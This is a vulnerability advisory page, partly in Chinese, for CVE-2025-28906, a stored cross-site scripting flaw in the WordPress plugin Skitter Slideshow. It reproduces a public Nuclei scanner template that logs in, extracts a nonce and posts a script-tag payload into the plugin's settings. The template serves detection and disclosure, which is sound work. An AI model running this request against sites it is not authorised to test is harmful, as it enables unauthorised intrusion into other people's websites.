CVE-2025-28906: Skitter Slideshow <= 2.5.2 - Authenticated (Administrator+) Stored Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Skitter Slideshow | POC: 已公开

漏洞描述

The Skitter Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping.

PoC代码[已公开]

id: CVE-2025-28906

info:
  name: Skitter Slideshow <= 2.5.2 - Authenticated (Administrator+) Stored Cross-Site Scripting
  author: nblirwn
  severity: medium
  description: |
    The Skitter Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-skitter-slideshow/skitter-slideshow-252-authenticated-administrator-stored-cross-site-scripting
    - https://wordpress.org/plugins/wp-skitter-slideshow/
    - https://patchstack.com/database/wordpress/plugin/wp-skitter-slideshow/vulnerability/wordpress-skitter-slideshow-plugin-2-5-2-cross-site-scripting-xss-vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 5.9
    cve-id: CVE-2025-28906
    cwe-id: CWE-79
    epss-score: 0.01172
    epss-percentile: 0.77942
  metadata:
    verified: true
    max-request: 5
    publicwww-query: "/wp-content/plugins/wp-skitter-slideshow/"
  tags: cve,cve2025,wp-plugin,wp-skitter-slideshow,wordpress,wp,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - "contains(body_1, 'wp-content/plugins/wp-skitter-slideshow/')"

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/options-general.php?page=wp_skitter_menu HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_page=wp_skitter_settings&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_skitter_menu&wp_skitter_type=posts&wp_skitter_category=1&wp_skitter_slides="><script>alert(document.domain)</script>&wp_skitter_xml=&wp_skitter_theme=square&wp_skitter_animation=random&wp_skitter_type_navigation=numbers&wp_skitter_width=&wp_skitter_height=&wp_skitter_background=%23000&wp_skitter_crop=true&wp_skitter_velocity=&wp_skitter_interval=&wp_skitter_navigation=true&wp_skitter_numbers_align=left&wp_skitter_label=true&wp_skitter_label_animation=&wp_skitter_width_label=&wp_skitter_easing_default=&wp_skitter_controls_position=&wp_skitter_focus_position=&wp_skitter_with_animations=&wp_skitter_auto_play=true

      - |
        GET /wp-admin/options-general.php?page=wp_skitter_menu HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_4 == 200"
          - "contains(body_4, '<script>alert(document.domain)</script>')"
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body_2
        group: 1
        internal: true
        regex:
          - 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
# digest: 4a0a00473045022050cd93356803577b4dd1a3e693647eafca728141878e5d466bcbf98a84b51979022100dfbe5632e68398373fb6f4c613577db4abb30fa019a2cea35bb0915a3f8f6d8b:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-28906.yaml